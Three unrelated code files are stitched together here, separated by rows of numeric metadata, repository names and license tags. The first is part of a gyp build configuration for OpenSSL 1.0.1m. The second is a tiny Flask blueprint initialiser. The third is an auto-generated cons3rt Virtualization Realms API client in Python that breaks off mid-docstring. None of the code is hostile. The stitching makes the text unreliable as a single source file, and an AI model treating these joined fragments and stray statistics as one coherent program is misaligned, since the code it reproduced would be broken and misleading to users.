"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_ameth.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_asn1.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_crypt.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_ctl.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_eng.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_keywrap.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_md.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_params.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_pmeth.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_sign.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gosthash.c",
"1.0.1m/openssl-1.0.1m/engines/e_4758cca.c",
"1.0.1m/openssl-1.0.1m/engines/e_aep.c",
"1.0.1m/openssl-1.0.1m/engines/e_atalla.c",
"1.0.1m/openssl-1.0.1m/engines/e_capi.c",
"1.0.1m/openssl-1.0.1m/engines/e_chil.c",
"1.0.1m/openssl-1.0.1m/engines/e_cswift.c",
"1.0.1m/openssl-1.0.1m/engines/e_gmp.c",
"1.0.1m/openssl-1.0.1m/engines/e_nuron.c",
"1.0.1m/openssl-1.0.1m/engines/e_padlock.c",
"1.0.1m/openssl-1.0.1m/engines/e_sureware.c",
"1.0.1m/openssl-1.0.1m/engines/e_ubsec.c",
# these are from ssl/Makefile, not sure why these didn't
# show up in the Windows nt.mak file.
"1.0.1m/openssl-1.0.1m/ssl/*.c"
],
"sources!": [
# exclude various tests that provide an impl of main():
"1.0.1m/openssl-1.0.1m/crypto/*/*test.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha256t.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha512t.c",
"1.0.1m/openssl-1.0.1m/crypto/*test.c",
"1.0.1m/openssl-1.0.1m/ssl/*test.c",
"1.0.1m/openssl-1.0.1m/ssl/ssl_task*.c"
],
"direct_dependent_settings": {
"include_dirs": [
"1.0.1m/openssl-1.0.1m/include"
]
},
"include_dirs": [
"1.0.1m/openssl-1.0.1m/include",
"1.0.1m/openssl-1.0.1m/crypto", # e.g. cryptlib.h
"1.0.1m/openssl-1.0.1m/crypto/asn1", # e.g. asn1_locl.h
"1.0.1m/openssl-1.0.1m/crypto/evp", # e.g. evp_locl.h
"1.0.1m/openssl-1.0.1m/crypto/modes",
"1.0.1m/openssl-1.0.1m" # e.g. e_os.h
],
"defines": [
# #defines shared across platforms copied from ms\nt.mak
"OPENSSL_NO_RC4",
"OPENSSL_NO_RC5",
"OPENSSL_NO_MD2",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_KRB5",
"OPENSSL_NO_HW",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_DYNAMIC_ENGINE"
],
"conditions": [
["OS=='win'", {
"defines": [
# from ms\nt.mak
"OPENSSL_THREADS",
"DSO_WIN32",
"OPENSSL_SYSNAME_WIN32",
"WIN32_LEAN_AND_MEAN",
"L_ENDIAN",
"_CRT_SECURE_NO_DEPRECATE",
"NO_WINDOWS_BRAINDEATH" # for cversion.c
],
"link_settings" : {
"libraries" : [
# external libs (from nt.mak)
"-lws2_32.lib",
"-lgdi32.lib",
"-ladvapi32.lib",
"-lcrypt32.lib",
"-luser32.lib"
]
}
}],
["OS=='mac'", {
"defines": [
"OPENSSL_NO_EC_NISTP_64_GCC_128",
"OPENSSL_NO_GMP",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_MD2",
"OPENSSL_NO_RC5",
"OPENSSL_NO_RFC3779",
"OPENSSL_NO_SCTP",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_STORE",
"OPENSSL_NO_UNIT_TEST",
"NO_WINDOWS_BRAINDEATH"
]
}],
["OS=='iOS'", {
"defines": [
"OPENSSL_NO_EC_NISTP_64_GCC_128",
"OPENSSL_NO_GMP",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_MD2",
"OPENSSL_NO_RC5",
"OPENSSL_NO_RFC3779",
"OPENSSL_NO_SCTP",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_STORE",
"OPENSSL_NO_UNIT_TEST",
"NO_WINDOWS_BRAINDEATH"
]
}],
["OS=='linux'", {
"defines": [
# from Linux Makefile after ./configure
"DSO_DLFCN",
"HAVE_DLFCN_H",
"L_ENDIAN", # TODO: revisit!
"TERMIO",
# otherwise with clang 3.5 on Ubuntu it get errors around
# ROTATE() macro's inline asm. Error I had not got on
# Centos with clang 3.4.
# Note that this is only a problem with cflags -no-integrated-as
# which was necessary for clang 3.4. Messy. TODO: revisit
"OPENSSL_NO_INLINE_ASM",
"NO_WINDOWS_BRAINDEATH" # for cversion.c, otherwise error (where is buildinf.h?)
],
"link_settings" : {
"libraries" : [ "-ldl" ]
}
}]
]
},
{
"target_name": "ssltest",
"type": "executable",
"test": {
"cwd": "1.0.1m/openssl-1.0.1m/test"
},
"defines": [
# without these we get linker errors since the test assumes
# by default that SSL2 & 3 was built
"OPENSSL_NO_RC4",
"OPENSSL_NO_RC5",
"OPENSSL_NO_MD2",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_KRB5",
"OPENSSL_NO_HW",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_DYNAMIC_ENGINE"
],
"include_dirs": [
"1.0.1m/openssl-1.0.1m" # e.g. e_os.h
],
"sources": [
# note how the ssl test depends on many #defines set via
# ./configure. Do these need to be passed to the test build
# explicitly? Apparently not.
"1.0.1m/openssl-1.0.1m/ssl/ssltest.c"
],
"dependencies": [ "openssl" ],
# this disables building the example on iOS
"conditions": [
["OS=='iOS'",
{
"type": "none"
}
]
]
}
# compile one of the (interactive) openssl demo apps to verify correct
# compiler & linker settings in upstream gyp target:
# P.S.: I dont think this test can compile on Windows, so this is not
# suitable as a cross-platform test.
#{
# "target_name": "demos-easy_tls",
# "type": "executable",
# not suitable as a test, just building this to see if it links
#"test": {
# "cwd": "1.0.1m/openssl-1.0.1m/demos/easy_tls"
#},
# "include_dir": [ "1.0.1m/openssl-1.0.1m/demos/easy_tls" ],
# "sources": [
# "1.0.1m/openssl-1.0.1m/demos/easy_tls/test.c",
# "1.0.1m/openssl-1.0.1m/demos/easy_tls/easy-tls.c"
# ],
# "dependencies": [ "openssl" ]
#}
]
}
| 57.504182
| 104
| 0.506368
| 8,375
| 48,131
| 2.823522
| 0.07797
| 0.111811
| 0.223622
| 0.307946
| 0.861082
| 0.859855
| 0.85588
| 0.854612
| 0.851609
| 0.840825
| 0
| 0.140884
| 0.303484
| 48,131
| 836
| 105
| 57.572967
| 0.564491
| 0.048534
| 0
| 0.101673
| 0
| 0.785071
| 0.637511
| 0.61525
| 0
| 0
| 0
| 0.001196
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.007722
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
528f223260b6da1582db3fdbc1f5debd5a28d9dd
| 111
|
py
|
Python
|
webpay_plus_mall/__init__.py
|
TransbankDevelopers/transbank-sdk-python-webpay-rest-example
|
81bdd421e3efe1285122b82ad0634cec8f499dff
|
[
"BSD-3-Clause"
] | 4
|
2021-03-23T19:51:02.000Z
|
2022-02-07T20:05:27.000Z
|
webpay_plus_mall/__init__.py
|
TransbankDevelopers/transbank-sdk-python-webpay-rest-example
|
81bdd421e3efe1285122b82ad0634cec8f499dff
|
[
"BSD-3-Clause"
] | 2
|
2019-07-30T18:35:23.000Z
|
2019-07-30T18:35:43.000Z
|
webpay_plus_mall/__init__.py
|
TransbankDevelopers/transbank-sdk-python-webpay-rest-example
|
81bdd421e3efe1285122b82ad0634cec8f499dff
|
[
"BSD-3-Clause"
] | 1
|
2021-01-25T17:58:34.000Z
|
2021-01-25T17:58:34.000Z
|
from flask import Blueprint
bp = Blueprint('webpay_plus_mall', __name__)
from webpay_plus_mall import routes
| 18.5
| 44
| 0.81982
| 16
| 111
| 5.1875
| 0.625
| 0.240964
| 0.337349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126126
| 111
| 5
| 45
| 22.2
| 0.85567
| 0
| 0
| 0
| 0
| 0
| 0.144144
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
bfed5d4d75aef4a4a7c58acf3a6d8954029b25e8
| 231,105
|
py
|
Python
|
cons3rt/api/virtualization_realms_api.py
|
cons3rt/cons3rt-python-sdk
|
f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0
|
[
"RSA-MD"
] | null | null | null |
cons3rt/api/virtualization_realms_api.py
|
cons3rt/cons3rt-python-sdk
|
f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0
|
[
"RSA-MD"
] | null | null | null |
cons3rt/api/virtualization_realms_api.py
|
cons3rt/cons3rt-python-sdk
|
f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0
|
[
"RSA-MD"
] | null | null | null |
# coding: utf-8
from __future__ import absolute_import
"""
Copyright 2020 Jackpine Technologies Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
cons3rt - Copyright Jackpine Technologies Corp.
NOTE: This file is auto-generated. Do not edit the file manually.
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from cons3rt.api_client import ApiClient
from cons3rt.exceptions import (
ApiTypeError,
ApiValueError
)
__author__ = 'Jackpine Technologies Corporation'
__copyright__ = 'Copyright 2020, Jackpine Technologies Corporation'
__license__ = 'Apache 2.0',
__version__ = '1.0.0'
__maintainer__ = 'API Support'
__email__ = 'support@cons3rt.com'
class VirtualizationRealmsApi(object):
"""NOTE: This class is auto-generated. Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_network(self, id, abstract_add_network_cloud_space_request, **kwargs): # noqa: E501
"""Allocate Network # noqa: E501
Adds a Network to the specified Virtualization Realm.<br> <br> Since this call results in the construction of a new, back-end Network it has financial implications and should not be used if the user is not prepared to incur the expense of construction and existence of the newly created Network. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network(id, abstract_add_network_cloud_space_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param AbstractAddNetworkCloudSpaceRequest abstract_add_network_cloud_space_request: The network allocation information (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: MinimalVirtualizationRealm
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_network_with_http_info(id, abstract_add_network_cloud_space_request, **kwargs) # noqa: E501
def add_network_with_http_info(self, id, abstract_add_network_cloud_space_request, **kwargs): # noqa: E501
"""Allocate Network # noqa: E501
Adds a Network to the specified Virtualization Realm.<br> <br> Since this call results in the construction of a new, back-end Network it has financial implications and should not be used if the user is not prepared to incur the expense of construction and existence of the newly created Network. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network_with_http_info(id, abstract_add_network_cloud_space_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param AbstractAddNetworkCloudSpaceRequest abstract_add_network_cloud_space_request: The network allocation information (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(MinimalVirtualizationRealm, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'abstract_add_network_cloud_space_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `add_network`") # noqa: E501
# verify the required parameter 'abstract_add_network_cloud_space_request' is set
if self.api_client.client_side_validation and ('abstract_add_network_cloud_space_request' not in local_var_params or # noqa: E501
local_var_params['abstract_add_network_cloud_space_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `abstract_add_network_cloud_space_request` when calling `add_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'abstract_add_network_cloud_space_request' in local_var_params:
body_params = local_var_params['abstract_add_network_cloud_space_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MinimalVirtualizationRealm', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def add_project(self, id, project_id, **kwargs): # noqa: E501
"""Assign Project # noqa: E501
Provides members of the Project with access to the specified Virtualization Realm # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_project(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to assign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: int
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_project_with_http_info(id, project_id, **kwargs) # noqa: E501
def add_project_with_http_info(self, id, project_id, **kwargs): # noqa: E501
"""Assign Project # noqa: E501
Provides members of the Project with access to the specified Virtualization Realm # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_project_with_http_info(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to assign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(int, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'project_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_project" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `add_project`") # noqa: E501
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `add_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'project_id' in local_var_params and local_var_params['project_id'] is not None: # noqa: E501
query_params.append(('projectId', local_var_params['project_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/projects', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='int', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_template_subsciption(self, id, registration_id, **kwargs): # noqa: E501
"""Create Template Subscription # noqa: E501
Creates a Template Subscription in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_template_subsciption(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateSubscription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_template_subsciption_with_http_info(id, registration_id, **kwargs) # noqa: E501
def create_template_subsciption_with_http_info(self, id, registration_id, **kwargs): # noqa: E501
"""Create Template Subscription # noqa: E501
Creates a Template Subscription in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_template_subsciption_with_http_info(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateSubscription, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_template_subsciption" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_template_subsciption`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `create_template_subsciption`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'registration_id' in local_var_params and local_var_params['registration_id'] is not None: # noqa: E501
query_params.append(('registration_id', local_var_params['registration_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateSubscription', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_network(self, id, network_id, **kwargs): # noqa: E501
"""Delete Network # noqa: E501
Removes an existing Network from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param bool deallocate: Attempt to delete all back-end resources
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_network_with_http_info(id, network_id, **kwargs) # noqa: E501
def delete_network_with_http_info(self, id, network_id, **kwargs): # noqa: E501
"""Delete Network # noqa: E501
Removes an existing Network from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network_with_http_info(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param bool deallocate: Attempt to delete all back-end resources
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'network_id', 'deallocate'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_network`") # noqa: E501
# verify the required parameter 'network_id' is set
if self.api_client.client_side_validation and ('network_id' not in local_var_params or # noqa: E501
local_var_params['network_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `network_id` when calling `delete_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'network_id' in local_var_params:
path_params['networkId'] = local_var_params['network_id'] # noqa: E501
query_params = []
if 'deallocate' in local_var_params and local_var_params['deallocate'] is not None: # noqa: E501
query_params.append(('deallocate', local_var_params['deallocate'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks/{networkId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_template_subscription(self, id, subscription_id, **kwargs): # noqa: E501
"""Delete Template Subscription # noqa: E501
Removes an existing Template Subscription from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_template_subscription(id, subscription_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_template_subscription_with_http_info(id, subscription_id, **kwargs) # noqa: E501
def delete_template_subscription_with_http_info(self, id, subscription_id, **kwargs): # noqa: E501
"""Delete Template Subscription # noqa: E501
Removes an existing Template Subscription from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_template_subscription_with_http_info(id, subscription_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'subscription_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_template_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_template_subscription`") # noqa: E501
# verify the required parameter 'subscription_id' is set
if self.api_client.client_side_validation and ('subscription_id' not in local_var_params or # noqa: E501
local_var_params['subscription_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `subscription_id` when calling `delete_template_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'subscription_id' in local_var_params:
path_params['subscription_id'] = local_var_params['subscription_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions/{subscription_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def disable_virt_realm_remote_access(self, id, **kwargs): # noqa: E501
"""Disable Remote Access # noqa: E501
Disables Remote Access for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_virt_realm_remote_access(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.disable_virt_realm_remote_access_with_http_info(id, **kwargs) # noqa: E501
def disable_virt_realm_remote_access_with_http_info(self, id, **kwargs): # noqa: E501
"""Disable Remote Access # noqa: E501
Disables Remote Access for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
